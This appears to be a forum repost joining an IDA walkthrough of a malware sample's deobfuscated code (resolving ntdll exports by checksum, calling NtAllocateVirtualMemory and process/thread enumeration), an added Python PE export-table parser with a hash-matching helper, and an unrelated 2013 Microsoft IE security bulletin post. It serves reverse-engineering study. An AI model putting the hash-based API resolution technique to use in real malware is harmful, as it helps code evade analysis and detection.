So far we’ve taken a look at the obfuscation routine and how it deobfuscates the instructions in loc_4033D1. At the beginning point, the overview navigator will look as shown on the picture below:

Upon executing the program, new functions will be discovered because the code is deobfuscated. The new overview navigator will look like this:

We can see that there are additional blue regions that correspond to functions. Additionally, there are also more instructions (brown area) rather than data items (grey area); this is because the data instructions were changed into code instructions as a result of the code deobfuscation. We’ve also already determined that the deobfuscated instructions are from 0x004034DD – 0x004041FD with occasional data elements.

Analyzing Deobfuscated Code

The first instructions of the deobfuscated code are presented on the picture below:

The first instruction loads the previously saved base address of the ntdll.dll library into register eax and then stores it at the stack offset location [ebp – 50]. The same value 0x7C900000 is then stored into the ecx register and the value stored at [0x7C90003C] is added to 0x7C900000. Let’s take a look at which value is located at the address 0x7C90003C; we can see that on the picture below: it’s 0x000000D0. So the value in the ecx register that’s later stored at [ebp-58] is 0x7C9000D0.

What just happened? It appears that the program has just read some value from the ntdll.dll library’s header (notice the “This program cannot be run in DOS mode” on the picture above – this is a clear indication that we’re looking at a PE executable file, either exe or dll; in this case this is the ntdll.dll DLL file). Then we can also apply the IMAGE_DOS_HEADER to the ntdll.dll.

We can do that by first going to the Structures window and pressing the Insert key, which will open the following pop-up dialog:

We need to click on the “Add standard structure” button and select the IMAGE_DOS_HEADER structure, as seen on the picture below. After adding that structure, we can apply it to the various memory locations in Ida’s database.

Now we need to apply that structure to the base address of the ntdll.dll file by going to its base address 0x7C900000 and clicking on Edit – Struct var, selecting IMAGE_DOS_HEADER and pressing OK. After that, we must also expand the structure at the 0x7C900000 location by pressing the ‘+’ key. The applied structure can be seen on the picture below:

Now the values in the structure have comments that correspond to the actual members of the structure; we no longer only have some bytes that don’t mean anything, but have the comments appended and we immediately know what each byte means. Let’s also take a look at the corresponding bytes, presented in the hex view:

We can see that the bytes in the hex view and in the disassembly view are exactly the same. We must keep in mind that db means 1 byte, dw 2 bytes and dd 4 bytes. The only weird thing is the “dw 4 dup(0)”, which means that we’re operating with an array that has 4 elements all initialized to 0 and every element is 2 bytes in size (hence the dw); this means that the total size of the array is 8 zero bytes. If we calculate the bytes from the hex view, we can see that their number actually corresponds to the disassembly view. The bytes we’re interested in, at address 0x7C90003C, which are the “dd 0D0h” bytes, mean that we have 4 bytes where 3 bytes are 0x00 and the last byte is 0xD0. These bytes correspond to the e_lfanew entry in the DLL header. If we Google what this field means, we’ll find an explanation that e_lfanew is a 4-byte offset into the file where the PE file header is located.

This field is used to find the PE file header in the DLL file, which occurs soon after the MSDOS header. We’ve just found out that the PE header is located at the offset 0x30, which means that we can apply the IMAGE_NT_HEADERS structure the same way as we did before with the IMAGE_DOS_HEADER structure to the address 0x7C9000D0. If we do that we’ll get the following comments which explain the PE header structure in detail:

So the initial code segment, located at address 0x004034E5, is loading the address of the PE header of the ntdll.dll file into the register ecx and later to the [ebp-58h] location. Let’s present the picture again, just to be clear about that.

Now let’s take a look at the next piece of code presented on the picture below:

We can see that we’re loading the address 0x7C9000D0 into register eax and address 0x7C900000 into register ecx and then adding the value stored at address 0x7C9000D0+0x78 to the ntdll base address. The actual address we’re accessing is 0x7C900148. That address is presented on the picture below (never mind that the actual address isn’t right, this is just how Ida presents the addresses where we’ve applied structures to: all have the same address as the base address of the structure):

This means that we’re adding the value 0x3400 to the value 0x7C900000, which makes the 0x7C903400 address. After that, we’re also storing the same value into [ebp-48h] and into the eax register. The next thing that happens is we’re adding the value at 0x7C903420 to 0x7C900000 and storing the result into ecx. The value at the 0x7C903420 address holds the value 0x48B8, which is presented below:

This means that we’re storing the value 0x7C9048B8 into [ebp-4Ch]. In the next step, we’re also reading the value 0x3428 from the picture above and storing the address 0x7C903428 into [ebp-54h]. Here we can see that we’re comparing the value from [ebp-6Ch] to the 0x39DBA17A constant.

If the value is not equal, we’re jumping to loc_4035F1, which consequently jumps back to loc_40352D. The value in [ebp-6Ch] is being calculated right before that code, and is presented on the picture below:

We can see that we’re taking the value from [ebp-68h], decreasing it by 1 and storing it at the same location. When that location contains the value 0, we’re breaking out of the loop and jumping to the loc_4035D0 location, which was presented on the previous picture that compares the value at [ebp-6Ch] to the constant 0x39DBA17A. We won’t go into details about this function, but we must keep in mind that this is the function that calculates the checksum of ntdll’s export function and then compares it to the 0x39DBA17A constant below.

Rather than evaluating this instruction by instruction, we can set a breakpoint at the 0x004035E9 instruction, which calculates the exact address of the function we’re looking for and is only reached when the checksum matches. The picture below presents the registers after executing that instruction:

It’s clear from the picture above that the program calls the NtAllocateVirtualMemory function from the ntdll.dll library file. The address of that function is stored at [ebp-10h], which is later called at the 0x0040367C address: “0040367C call dword ptr [ebp-10h]“. The code that follows copies the ntdll file into the previously reserved address space in memory and then calls the function sub_4030E5, which we can see on the picture below:

The sub_4030E5 Function

Let’s analyze the sub_4030E5 function just for the fun of it. Let’s present the start of the disassembly instructions of that function:

The function is first creating a new stack frame and reserving 0x310 bytes for the local variables. After that, we’re entering a very interesting loop, as can be seen on the picture below:

With the jz instruction we’re jumping to the “mov esi, edx” instruction, which stores the value from register edx into register esi. But the important thing is what happens next; we’re comparing the value in esi with the constant 0x190BC2. If the values are equal, we’re ending the loop and moving on with the program execution. Otherwise, we’re continuing the execution of the loop. First, we’re adding the constant 8 to the address in the ecx register and reading the value from that address into register esi, then comparing that value with the value in ebx. When entering that block for the first time, the ecx register contains the value 0x087E0000. This is why we’re actually reading the value from the address 0x087E0008 and other consecutive addresses. The values at those addresses are presented on the picture below:

The ebx register contains the value 0x00000000, which means that we’ll be reading every other value from address 0x087E0008 onwards until reading the value 0x00190BC2 or reaching the end of the data structure (the 0x00000000 value). If we place a breakpoint on the address 0x0040311E and run the program, the breakpoint will be hit right at the moment when the value at the address stored in register ecx matches the 0x00190BC2 constant. When that happens, the value in the ecx register is 0x087E0420. If we take a look at the memory address, we can see that this is truly the case:

What’s happening in this case is that the program is going through the export table of the ntdll.dll library trying to match the checksum of a function with the constant 0x00190BC2. Here we’re reading the next 4 bytes from the currently found address into register ecx. This means that the register ecx will contain the value 0x0000C1AE (take a look at the previous image where we’ve dumped the memory).

This is also the reason why we’ve been reading every other 4 bytes and leaving the middle four bytes alone when matching the checksum; I guess the middle 4 bytes hold some specific information regarding the previous checksum value, so that every checksum value has its corresponding additional 4 bytes used for something which we currently don’t know yet. Then we’re adding the value in register edi to the value in register ecx and storing the value on the stack at offset [ebp+var_C]. Later, in the same function, we’re calling this value, which means that we’ve probably calculated some kind of address. If we place a breakpoint at that function and run the program, the breakpoint is hit right at the moment where we can step into the function being called. When we step into the function, we’re actually executing the following code:

We’re pushing the value 0x00156DC5 to the stack and returning to that function. The function then starts… as presented on the picture below:

We won’t go into details about what this function does; let’s just say that it calls multiple functions, which we’ll take a look at here. The function calls the following functions:

debug006:00156DD0 call near ptr unk_151EDF
debug006:00156DED call off_174998
debug006:00156E09 call near ptr unk_16C977
debug006:00156E6D call off_174990

Let’s take a look at the code of every single function call. First, we have the function at address 0x00151EDF. Its code is presented below:

We can see that the function does nothing special; it just initializes the stack for the function call to the data cross-reference off_141280 that holds the value of the kernel32_WaitForSingleObject function:

If we step into the function, it’s clear that the function WaitForSingleObject from the kernel32 DLL is being called. This can be seen on the picture below:

Let’s continue to the next function at address 0x00174998, where it’s immediately evident that the NtQueryInformationProcess function is being called:

If we step into the function at address 0x7C90D808, it’s clear that the KiFastSystemCall function is being called, as seen on the picture below:

We can see that we’re moving the value of esp into the register edx. The registers, before executing the sysenter instruction, are presented below:

Upon stepping into the sysenter instruction, we’re immediately taken to the previously called function, which is NtQueryInformationProcess. You can see that on the picture below (notice the EIP pointing at the retn instruction after the function call):

Let’s take a look at the next function call at address 0x0016C977. The code of that function is too big to fit into a picture, which is why I’m presenting only the function calls in that function, which can be seen below:

debug006:0016C977 ; ---------------------------------------------------------------------------
debug006:0016C977
debug006:0016C977 loc_16C977: ; CODE XREF: debug006:00156E09↑p
debug006:0016C984 call off_141270
debug006:0016C99F call off_1411D8
debug006:0016C9B5 call off_141214
debug006:0016C9C0 call off_1412BC
debug006:0016C9CA leave
debug006:0016C9CB retn 4

The call to off_141270 causes subsequent calls to the following functions: kernel32_CreateToolhelp32Snapshot, kernel32_GetCurrentProcessId, kernel32_CloseHandle and others. The call at off_1411D8 causes the program to call kernel32_Thread32First. Finally, the call at off_1412BC causes the program to call kernel32_CloseHandle.

The function call at off_174990 calls the instructions presented on the picture below:

This essentially calls the function loc_7C90D1B8 presented below:

And those instructions then call KiFastSystemCall, presented on the picture below:

Conclusion

We’ve seen how to deobfuscate the obfuscated code in Ida and presented how to apply various structures to the executable, which may come in handy if the malware is trying to grab some value from the executable’s PE header. We’ve also taken a look at the sub_4030E5 function that calls various system functions in the kernel32.dll library.

Sursa: InfoSec Institute Resources – Cracking the Defender: The Deobfuscated Code
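Added worked example (not from the article or the Defender sample): a Python walk of the same header chain the post follows by hand, e_lfanew at 0x3C, the export table RVA at IMAGE_NT_HEADERS+0x78, then the name, ordinal and address arrays of IMAGE_EXPORT_DIRECTORY. It runs over a constructed in-memory PE32 image rather than ntdll.dll, and the checksum routine is assumed to be supplied by the analyst, since the post does not recover it.

```python
import struct

def u16(img, off): return struct.unpack_from("<H", img, off)[0]
def u32(img, off): return struct.unpack_from("<I", img, off)[0]

def export_directory(img):
    """Follow e_lfanew (offset 0x3C) to IMAGE_NT_HEADERS, then read
    DataDirectory[0] (export table RVA) at NT headers + 0x78 (PE32)."""
    if img[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    nt = u32(img, 0x3C)                                  # e_lfanew
    if img[nt:nt + 4] != b"PE\0\0":
        raise ValueError("e_lfanew does not point at the PE signature")
    if u16(img, nt + 0x18) != 0x10B:                     # optional header Magic
        raise ValueError("PE32 only; PE32+ keeps the export directory at +0x88")
    return u32(img, nt + 0x78)

def enumerate_exports(img):
    """Map exported names to function RVAs by walking IMAGE_EXPORT_DIRECTORY.
    Assumes a loaded image (RVA == offset from base), as in the debugger session;
    a file on disk would need section-table RVA-to-offset translation first."""
    exp = export_directory(img)
    n_names = u32(img, exp + 0x18)                       # NumberOfNames
    funcs, names, ords = (u32(img, exp + o) for o in (0x1C, 0x20, 0x24))
    result = {}
    for i in range(n_names):
        name_rva = u32(img, names + 4 * i)
        name = img[name_rva:img.index(b"\0", name_rva)].decode("ascii")
        ordinal = u16(img, ords + 2 * i)                 # index into AddressOfFunctions
        result[name] = u32(img, funcs + 4 * ordinal)
    return result

def match_export_hash(img, hash_fn, constant):
    """Analyst helper: given the recovered checksum routine (hash_fn is assumed,
    the post does not reconstruct it) and the constant the sample compares
    against, return the export name that constant stands for."""
    for name in enumerate_exports(img):
        if hash_fn(name) == constant:
            return name
    return None

def build_sample_image():
    """Constructed minimal PE32 memory image (not ntdll.dll) with three exports;
    e_lfanew = 0xD0 and export table RVA = 0x3400 mirror the values in the post."""
    exports = {b"NtAllocateVirtualMemory": 0x1A20, b"NtClose": 0x1B40,
               b"NtQueryInformationProcess": 0x1C10}     # constructed RVAs
    img = bytearray(0x4000)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0xD0)              # e_lfanew
    nt, exp = 0xD0, 0x3400
    img[nt:nt + 4] = b"PE\0\0"
    struct.pack_into("<H", img, nt + 0x18, 0x10B)        # PE32 magic
    struct.pack_into("<II", img, nt + 0x78, exp, 0x200)  # export dir RVA, size
    names = sorted(exports)
    funcs, name_ptrs, ords, strings = exp + 0x28, exp + 0x38, exp + 0x48, exp + 0x60
    # Base, NumberOfFunctions, NumberOfNames, AddressOfFunctions/Names/NameOrdinals
    struct.pack_into("<IIIIII", img, exp + 0x10, 1, len(names), len(names), funcs, name_ptrs, ords)
    for i, name in enumerate(names):
        struct.pack_into("<I", img, funcs + 4 * i, exports[name])
        struct.pack_into("<I", img, name_ptrs + 4 * i, strings)
        struct.pack_into("<H", img, ords + 2 * i, i)
        img[strings:strings + len(name) + 1] = name + b"\0"
        strings += len(name) + 1
    return bytes(img)
```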
-
February 2013 Internet Explorer updates

Today we released two critically rated bulletins and one security advisory for Internet Explorer.

Microsoft Security Bulletin MS13-009 – Critical

This security update resolves thirteen privately reported vulnerabilities in Internet Explorer. The most severe vulnerabilities could allow remote code execution if a user views a specially crafted Web page using Internet Explorer. An attacker who successfully exploited these vulnerabilities could gain the same user rights as the current user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. This security update is rated Critical for Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, Internet Explorer 9, and Internet Explorer 10 on Windows clients and Moderate for Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, Internet Explorer 9, and Internet Explorer 10 on Windows servers. For more information, please see the full bulletin.

Microsoft Security Bulletin MS13-010 – Critical

This security update resolves a privately reported vulnerability in the Microsoft implementation of Vector Markup Language (VML). The vulnerability could allow remote code execution if a user viewed a specially crafted Web page using Internet Explorer. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. This security update is rated Critical for Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, Internet Explorer 9, and Internet Explorer 10 on all supported releases of Microsoft Windows. For more information, see the full bulletin.

Microsoft Security Advisory (2755801)

Microsoft is also announcing the availability of an update for the Adobe Flash Player in Internet Explorer 10 on all supported editions of Windows 8, Windows Server 2012, and Windows RT. The update addresses the vulnerabilities in Adobe Flash Player by updating the affected Adobe Flash libraries contained within Internet Explorer 10. For more information please see the full advisory.

Recommendation

Most customers have automatic updating enabled and will not need to take any action because this security update will be downloaded and installed automatically. Customers who have not enabled automatic updating need to check for updates and install this update manually. For information about specific configuration options in automatic updating, see Microsoft Knowledge Base Article 294871.

For administrators and enterprise installations, or end users who want to install this security update manually, Microsoft recommends that customers apply the update immediately using update management software, or by checking for updates using the Microsoft Update service.

— Tyson Storey, Program Manager, Internet Explorer

Sursa: February 2013 Internet Explorer updates - IEBlog - Site Home - MSDN Blogs